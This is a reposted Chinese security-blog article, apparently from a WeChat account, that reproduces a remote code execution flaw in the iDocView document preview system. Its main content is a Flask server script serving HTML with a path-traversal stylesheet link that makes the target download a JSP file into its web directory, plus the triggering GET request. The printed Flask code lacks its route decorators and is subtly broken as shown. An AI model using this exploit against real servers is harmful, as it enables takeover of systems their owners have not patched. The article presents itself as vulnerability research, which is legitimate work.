声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
现在只对常读和星标的公众号才展示大图推送,建议大家把公众号“Panda安全”设为星标,否则可能看不到了!
0x00 漏洞介绍
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统,用于在Web环境中展示和预览各种文档类型,如文本文档、电子表格、演示文稿、PDF文件等。
攻击者可利用该漏洞使服务器下载恶意文件,获取服务器控制权限。经分析,该漏洞利用难度低,可造成远程代码执行,建议尽快修复。
要求:出网
0x01 影响版本
iDocView < 13.10.1_20231115
0x02 漏洞复现
flash.py
from flask import Flask
app = Flask(__name__)
def index():
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>title</title>
<link rel="stylesheet" href="..\..\..\docview\aaaa.jsp">
</head>
<body>
</body>
</html>"""
def jsp():
return '''<%
out.print("123");
%>'''
if __name__ == '__main__':
app.run(host="0.0.0.0", port=39999)
发送请求
GET /html/2word?url=http://xxx.xxx.xxx.xxx:39999/index.html HTTP/1.1
Host: 127.0.0.1
Connection: close
原文始发于微信公众号(Panda安全):【0day】i Doc View 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论